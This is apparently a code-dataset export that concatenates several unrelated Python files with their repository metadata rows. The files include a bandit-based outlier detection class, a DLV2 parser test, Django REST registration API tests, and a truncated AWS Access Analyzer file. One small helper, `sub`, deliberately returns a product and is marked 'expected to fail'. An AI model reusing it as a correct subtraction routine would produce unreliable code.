self.update_internal_elimi()
def update_elimi(self):
self.t += 1
if len(self.sample_candidate) > 0:
arm = np.random.choice(self.sample_candidate)
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.pulls[arm] += 1
self.wins[arm] += rwd
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
self.update_internal_elimi()
# lucb styled algorithm
def update_internal_lucb(self):
[start, end] = self.cluster_boundary_spec
ranking_lcbs = np.argsort(self.lcbs[self.index_select])
self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
ranking_ucbs = np.argsort(self.ucbs[self.index_select])
self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
for i in self.index_select:
self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
# we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
# if self.ucbs[i] >= self.median_ucb:
# if self.median_ucb <= self.lcbs[i]:
# self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
# else:
# self.AD_lcbs[i] = 0
# else:
# if self.ucbs[i] <= self.median_lcb:
# self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
# else:
# self.AD_lcbs[i] = 0
if self.AD_ucbs[i] < self.AD_lcbs[i]:
print('something wrong when computing the absolute deviation')
ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
self.s_active = list(range(self.n))
for i in range(self.n):
if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
self.s_active.remove(i)
self.s_active_len = len(self.s_active)
ranking_means = np.argsort(self.rewards[self.index_select])
self.s_l_at = self.index_select[ranking_means[:start]]
self.s_m_at = self.index_select[ranking_means[start:end]]
self.s_u_at = self.index_select[ranking_means[end:]]
self.median_at = sum(self.rewards[i] for i in self.s_m_at) / len(self.s_m_at)
for i in self.index_select:
self.AD_at[i] = (self.AD_lcbs[i] + self.AD_ucbs[i])/2
# self.AD_at[i] = abs(self.rewards[i] - self.median_at)
# one can also calculate \hat{AD} in the commented way and it produce slightly better results in the beginning period
# s_lAD_at denote the set of arms associated with low value of AD
ranking_AD = np.argsort(self.AD_at[self.index_select])
self.s_lAD_at = self.index_select[ranking_AD[:start]]
self.s_MAD_at = self.index_select[ranking_AD[start:end]]
self.s_uAD_at = self.index_select[ranking_AD[end:]]
self.MAD_at = sum(self.AD_at[i] for i in self.s_MAD_at) / len(self.s_MAD_at)
# self.threshold_at = self.median_at + self.k * self.MAD_at
self.s_outlier_at = []
self.s_not_outlier_at = []
for arm in range(self.n):
if self.rewards[arm] >= self.threshold_at:
self.s_outlier_at.append(arm)
else:
self.s_not_outlier_at.append(arm)
# things below are specified for the lucb style
# arms whose confidence interval intersects with the c.i. of threshold should be sample candidates
self.sample_candidate = []
self.sample_candidate_arms = []
self.sample_candidate_threshold = []
s_outlier_at = self.s_outlier_at
s_candidate = [(x, self.lcbs[x]) for x in s_outlier_at]
if len(s_candidate) > 0:
candidate_value = min(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_arms.append(candidate)
s_not_outlier_at = self.s_not_outlier_at
s_candidate = [(x, self.ucbs[x]) for x in s_not_outlier_at]
if len(s_candidate) > 0:
candidate_value = max(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_arms.append(candidate)
s_l_at = self.s_l_at
s_candidate = [(x, self.ucbs[x]) for x in s_l_at]
if len(s_candidate) > 0:
candidate_value = max(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_u_at = self.s_u_at
s_candidate = [(x, self.lcbs[x]) for x in s_u_at]
if len(s_candidate) > 0:
candidate_value = min(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_lAD_at = self.s_lAD_at
s_candidate = [(x, self.AD_ucbs[x]) for x in s_lAD_at]
if len(s_candidate) > 0:
candidate_value = max(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_uAD_at = self.s_uAD_at
s_candidate = [(x, self.AD_lcbs[x]) for x in s_uAD_at]
if len(s_candidate) > 0:
candidate_value = min(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_lm_at = set(list(self.s_l_at) + list(self.s_m_at))
s_candidate = [(x, self.ucbs[x]) for x in s_lm_at]
if len(s_candidate) > 0:
candidate_value = max(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_um_at = set(list(self.s_u_at) + list(self.s_m_at))
s_candidate = [(x, self.lcbs[x]) for x in s_um_at]
if len(s_candidate) > 0:
candidate_value = min(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_lmAD_at = set(list(self.s_lAD_at) + list(self.s_MAD_at))
s_candidate = [(x, self.AD_ucbs[x]) for x in s_lmAD_at]
if len(s_candidate) > 0:
candidate_value = max(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
s_umAD_at = set(list(self.s_uAD_at) + list(self.s_MAD_at))
s_candidate = [(x, self.AD_lcbs[x]) for x in s_umAD_at]
if len(s_candidate) > 0:
candidate_value = min(s_candidate, key=lambda x: x[1])[1]
s_candidate_index = [x for x,y in s_candidate if y == candidate_value]
candidate = np.random.choice(s_candidate_index)
self.sample_candidate.append(candidate)
self.sample_candidate_threshold.append(candidate)
#self.sample_candidate = list(set(self.sample_candidate))
# since we only pull one arm at each time in experiment, we will allow repeated arms in sample candidate
# actually that's more fair to increase the prob to select that arm
def initialization_lucb(self):
self.index_select = np.random.choice(self.n, self.n_select, replace=False)
# compute true set of outliers
n = self.n_select
if n % 2 == 1:
start = int((n - 1) / 2)
end = int((n + 1) / 2)
else:
start = int((n - 2) / 2)
end = int((n + 2) / 2)
self.cluster_boundary_spec = [start, end]
ranking = np.argsort(self.instance[self.index_select])
self.s_l_spec = self.index_select[ranking[:start]]
self.s_m_spec = self.index_select[ranking[start:end]]
self.s_u_spec = self.index_select[ranking[end:]]
self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
for i in range(self.n):
self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
ranking_AD = np.argsort(self.AD_spec[self.index_select])
self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
self.threshold_spec = self.median_spec + self.k * self.MAD_spec
for arm in range(self.n):
if self.instance[arm] > self.threshold_true:
self.outlier_set_true.append(arm)
if self.instance[arm] > self.threshold_spec - self.tol:
self.outlier_set_spec_sup.append(arm)
if self.instance[arm] > self.threshold_spec:
self.outlier_set_spec.append(arm)
if self.instance[arm] > self.threshold_spec + self.tol:
self.outlier_set_spec_sub.append(arm)
# pull each arm once
for arm in range(self.n):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
self.update_internal_lucb()
def update_lucb(self):
self.t += 1
if len(self.sample_candidate) > 0:
# if len(self.sample_candidate_arms) > 0 and len(self.sample_candidate_threshold) > 0:
# dice = np.random.random()
# if dice > 0.5:
# arm = np.random.choice(self.sample_candidate_threshold)
# else:
# arm = np.random.choice(self.sample_candidate_arms)
# else:
# arm = np.random.choice(self.sample_candidate)
arm = np.random.choice(self.sample_candidate)
# randomly pull an arm from sample_candidate
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.pulls[arm] += 1
self.wins[arm] += rwd
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
self.update_internal_lucb()
def output_outlier_set(self):
outlier_set_empirical = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold_at:
outlier_set_empirical.append(arm)
return outlier_set_empirical
def compute_error(self):
outlier_set_at = self.output_outlier_set()
error_spec_tol = 1
error_spec = 1
if (set(outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
(set(self.outlier_set_spec_sub).issubset(set(outlier_set_at))):
error_spec_tol = 0
if outlier_set_at == self.outlier_set_spec:
error_spec = 0
error_general = 1
if outlier_set_at == self.outlier_set_true:
error_general = 0
return error_general, error_spec_tol, error_spec
| 45.800399 | 129 | 0.604855 | 6,598 | 45,892 | 3.984692 | 0.039709 | 0.026055 | 0.039938 | 0.026701 | 0.916397 | 0.892244 | 0.873569 | 0.85516 | 0.839755 | 0.830056 | 0 | 0.007251 | 0.284777 | 45,892 | 1,001 | 130 | 45.846154 | 0.793742 | 0.098078 | 0 | 0.880835 | 0 | 0 | 0.005813 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044226 | false | 0 | 0.002457 | 0 | 0.076167 | 0.003686 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9536ce981b6536882de7dc3089d585f8a4475eb4 | 323 | py | Python | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | tests/parser/aggregates.duplicated.2.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
mymax(X) :- #max{P: c(P)} = X, dom(X).
mymin(X) :- #min{P: c(P)} = X, dom(X).
dom(0). dom(1).
c(X) | d(X) :- dom(X).
:- not c(0).
:- not c(1).
"""
output = """
mymax(X) :- #max{P: c(P)} = X, dom(X).
mymin(X) :- #min{P: c(P)} = X, dom(X).
dom(0). dom(1).
c(X) | d(X) :- dom(X).
:- not c(0).
:- not c(1).
"""
| 15.380952 | 38 | 0.405573 | 70 | 323 | 1.871429 | 0.2 | 0.244275 | 0.229008 | 0.122137 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0 | 0.031128 | 0.204334 | 323 | 20 | 39 | 16.15 | 0.478599 | 0 | 0 | 0.875 | 0 | 0.25 | 0.904025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
956835eda2d95416bd44725febb9c4b266773591 | 133 | py | Python | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | 2 | 2015-10-28T21:12:36.000Z | 2016-09-08T14:00:41.000Z | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | null | null | null | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | null | null | null | from treebankanalytics.readers import sagae
from treebankanalytics.readers import sdp
from treebankanalytics.readers import sequoia
| 26.6 | 45 | 0.879699 | 15 | 133 | 7.8 | 0.466667 | 0.538462 | 0.717949 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097744 | 133 | 4 | 46 | 33.25 | 0.975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
95f1254d7bb01a9757ce9a07660db28e0f09cfec | 122 | py | Python | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | 1 | 2019-06-13T16:18:45.000Z | 2019-06-13T16:18:45.000Z | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | null | null | null | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | null | null | null | def add(a, b):
return a+b
def sub(a, b):
return a*b #expected to fail
def op(f, a, b):
return f(a,b) | 15.25 | 32 | 0.516393 | 26 | 122 | 2.423077 | 0.423077 | 0.190476 | 0.380952 | 0.285714 | 0.31746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.327869 | 122 | 8 | 33 | 15.25 | 0.768293 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
c26820b05cea852ab983daa2e9176aa3e7dbc2c8 | 107 | py | Python | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | from .util import call_github_api, eprint, get_hash_of_members, members_hash_from_version, validate_source
| 53.5 | 106 | 0.878505 | 17 | 107 | 5 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074766 | 107 | 1 | 107 | 107 | 0.858586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
6c85391946bc5f9d0167f8e5cbe44107416e9f66 | 13,661 | py | Python | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | 1 | 2018-11-14T18:25:01.000Z | 2018-11-14T18:25:01.000Z | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | null | null | null | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | 1 | 2021-05-24T15:49:58.000Z | 2021-05-24T15:49:58.000Z | import math
import time
from unittest.mock import patch
from django.test.utils import override_settings
from rest_framework import status
from rest_registration.api.views.register import RegisterSigner
from rest_registration.settings import registration_settings
from .base import APIViewTestCase
REGISTER_VERIFICATION_URL = '/verify-account/'
VERIFICATION_FROM_EMAIL = 'no-reply@example.com'
REST_REGISTRATION_WITH_VERIFICATION = {
'REGISTER_VERIFICATION_ENABLED': True,
'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
}
REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD = {
'REGISTER_VERIFICATION_ENABLED': True,
'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
'REGISTER_SERIALIZER_PASSWORD_CONFIRM': False,
}
REST_REGISTRATION_WITHOUT_VERIFICATION = {
'REGISTER_VERIFICATION_ENABLED': False,
}
REST_REGISTRATION_WITH_HTML_EMAIL_VERIFICATION = {
'REGISTER_VERIFICATION_ENABLED': True,
'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
'REGISTER_VERIFICATION_EMAIL_TEMPLATES': {
'subject': 'rest_registration/register/subject.txt',
'html_body': 'rest_registration/register/body.html',
},
'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
}
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
class RegisterViewTestCase(APIViewTestCase):
VIEW_NAME = 'register'
def test_register_serializer_ok(self):
serializer_class = registration_settings.REGISTER_SERIALIZER_CLASS
serializer = serializer_class(data={})
field_names = {f for f in serializer.get_fields()}
self.assertEqual(
field_names,
{'id', 'username', 'first_name', 'last_name', 'email',
'password', 'password_confirm'},
)
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD,
)
def test_register_serializer_no_password_ok(self):
serializer_class = registration_settings.REGISTER_SERIALIZER_CLASS
serializer = serializer_class(data={})
field_names = {f for f in serializer.get_fields()}
self.assertEqual(
field_names,
{'id', 'username', 'first_name', 'last_name', 'email', 'password'},
)
def test_register_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
time_after = math.ceil(time.time())
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_line_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
# TODO: unskip this test when × entity problem will be fixed.
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITH_HTML_EMAIL_VERIFICATION,
)
def test_register_with_html_email_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
time_after = math.ceil(time.time())
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_in_brackets_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD,
)
def test_register_no_password_confirm_ok(self):
data = self._get_register_user_data(password='testpassword')
data.pop('password_confirm')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_201_CREATED)
time_after = math.ceil(time.time())
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_line_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
def test_register_same_username(self):
self.create_test_user(username='testusername')
data = self._get_register_user_data(
username='testusername', password='testpassword')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITHOUT_VERIFICATION,
)
def test_register_without_verification_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertTrue(user.is_active)
def test_register_missing_email(self):
data = self._get_register_user_data(password='testpassword')
del data['email']
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
def test_register_empty_email(self):
data = self._get_register_user_data(password='testpassword', email='')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_short_password(self):
data = self._get_register_user_data(password='a')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_password_numeric(self):
data = self._get_register_user_data(password='4321332211113322')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_password_same_as_username(self):
username = 'testusername'
data = self._get_register_user_data(
username=username, password=username)
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_not_matching_password(self):
data = self._get_register_user_data(
password='testpassword1',
password_confirm='testpassword2')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def _get_register_user_data(
self, password, password_confirm=None, **options):
username = 'testusername'
email = 'testusername@example.com'
if password_confirm is None:
password_confirm = password
data = {
'username': username,
'password': password,
'password_confirm': password_confirm,
'email': email,
}
data.update(options)
return data
class VerifyRegistrationViewTestCase(APIViewTestCase):
VIEW_NAME = 'verify-registration'
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_ok(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_200_OK)
user.refresh_from_db()
self.assertTrue(user.is_active)
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_tampered_timestamp(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
data['timestamp'] += 1
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
user.refresh_from_db()
self.assertFalse(user.is_active)
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_expired(self):
timestamp = int(time.time())
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
with patch('time.time',
side_effect=lambda: timestamp):
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
with patch('time.time',
side_effect=lambda: timestamp + 3600 * 24 * 8):
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
user.refresh_from_db()
self.assertFalse(user.is_active)
@override_settings(
REST_REGISTRATION={
'REGISTER_VERIFICATION_ENABLED': False,
'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
}
)
def test_verify_disabled(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_404_NOT_FOUND)
user.refresh_from_db()
self.assertFalse(user.is_active)
| 42.033846 | 79 | 0.695044 | 1,576 | 13,661 | 5.649112 | 0.102157 | 0.035943 | 0.021566 | 0.035381 | 0.824329 | 0.816129 | 0.787712 | 0.781871 | 0.760867 | 0.733011 | 0 | 0.005491 | 0.213528 | 13,661 | 324 | 80 | 42.16358 | 0.823157 | 0.015445 | 0 | 0.679577 | 0 | 0 | 0.086445 | 0.036081 | 0 | 0 | 0 | 0.003086 | 0.242958 | 1 | 0.06338 | false | 0.119718 | 0.028169 | 0 | 0.109155 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
dd02975fd672ab82b6392179c3a15280c35b0d94 | 7,909 | py | Python | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
] | 1 | 2020-01-29T22:55:29.000Z | 2020-01-29T22:55:29.000Z | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
